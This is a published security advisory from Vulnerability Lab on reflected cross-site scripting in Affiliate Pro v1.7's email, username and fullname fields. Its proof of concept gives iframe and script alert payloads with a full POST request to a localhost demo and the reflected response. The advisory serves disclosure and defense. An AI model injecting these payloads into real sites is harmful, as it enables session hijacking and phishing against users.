===============
Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2281
Release Date:
=============
2022-01-05
Vulnerability Laboratory ID (VL-ID):
====================================
2281
Common Vulnerability Scoring System:
====================================
5.1
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Affiliate Pro is a Powerful and yet simple to use PHP affiliate
Management System for your new or existing website. Let
affiliates
sell your products, bring you traffic or even leads and reward them
with a commission. More importantly, use Affiliate Pro to track
it intelligently to keep your affiliates happy and also your bottom
line! So how does it work? It is pretty simple, when a user
visits
your website through an affiliate URL the responsible affiliate
sending the traffic to you will receive a commission based on your
settings.
(Copy of the Homepage:https://jdwebdesigner.com/ &https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
reflected cross site scripting web vulnerabilities in the Affiliate
Pro - Affiliate Management System v1.7.
Affected Product(s):
====================
jdwebdesigner
Product: Affiliate Pro v1.7 - Affiliate Management System (PHP)
(Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security
Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-08-30: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple reflected cross site scripting web vulnerabilities has
been discovered in the Affiliate Pro - Affiliate Management System
v1.7.
The vulnerability allows remote attackers to inject own malicious
script codes with non-persistent attack vector to compromise
client-site
browser to web-application requests.
The non-persistent cross site scripting web vulnerabilities are
located in the `email`,`username` and `fullname` parameters of the
`index` module.
Attackers are able to inject own malicious script code to the
`Fullname`,`Username` or `Email` input fields to manipulate
client-side requests.
The request method to inject is post and the attack vector is
non-persistent (reflected) on client-side. The injection- and
execution points are
located in the index formular for affiliates to enter.
Successful exploitation of the vulnerabilities results in
session hijacking, non-persistent phishing attacks, non-persistent
external redirects to
malicious source and non-persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] index
Vulnerable Input(s):
[+] Email
[+] Username
[+] Fullname
Vulnerable Parameter(s):
[+] email
[+] username
[+] fullname
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be
exploited by remote attackers without account and with low or
medium user interaction.
For security demonstration or to reproduce the cross site scripting
web vulnerability follow the provided information and steps below
to continue.
Exploitation: Payload
<iframe src="javascript:alert(1337)"></iframe>
%3cscript%3ealert(1337)%3c%2fscript%3
--- PoC Session Logs (POST) ---
POST /affiliate-pro-demo/index HTTP/1.1
Host: affiliates-pro.localhost:8000
Origin:http://affiliates-pro.localhost:8000
Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24
Referer:http://affiliates-pro.localhost:8000/affiliate-pro-demo/
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
-
fullname=<iframe
src="javascript:alert(1337)"></iframe>
&username=<iframe
src="javascript:alert(1337)"></iframe>@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv
&p=test&confirmpwd=j2B%21p5o%21K8
-
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/;
HttpOnly
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 6549
Content-Type: text/html; charset=UTF-8
Vulnerable Source: Index
<div class="control-group">
<label class="control-label" for="fullname">Full
Name</label>
<div class="controls">
<input id="textinput" name="fullname" type="text"
placeholder="Full Name" class="input-xlarge" value="<iframe
src="javascript:alert(1337)"></iframe>"
required="required">
</div>
</div>
<div class="control-group">
<label class="control-label"
for="username">Username</label>
<div class="controls">
<input id="textinput" name="username" type="text"
placeholder="username" class="input-xlarge" value="<iframe
src="javascript:alert(1337)"></iframe>" required>
</div>
</div>
<div class="control-group">
<label class="control-label" for="email">E-Mail
Address</label>
<div class="controls">
<input id="textinput" name="email" type="email"
placeholder="
</div>
Security Risk:
==============
The security risk of the client-side cross site scripting
vulnerabilities in the web-application are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team]
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is
without any warranty. Vulnerability Lab disclaims all
warranties,
either expressed or implied, including the warranties of
merchantability and capability for a particular purpose.
Vulnerability-Lab
or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits
or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may
not apply.
We do not approve or encourage anybody to break any licenses,
policies, deface websites, hack into databases or trade with stolen
data.
Domains:www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com
infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages,
of this file requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its
unmodified form is granted. All other rights, including the use of
other
media, are reserved by Vulnerability-Lab Research Team or its
suppliers. All pictures, texts, advisories, source code, videos and
other
information on this website is trademark of vulnerability-lab team
& the specific authors or managers. To record, list, modify, use
or
edit our material contact (admin@ or research@) to get a ask
permission.
Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
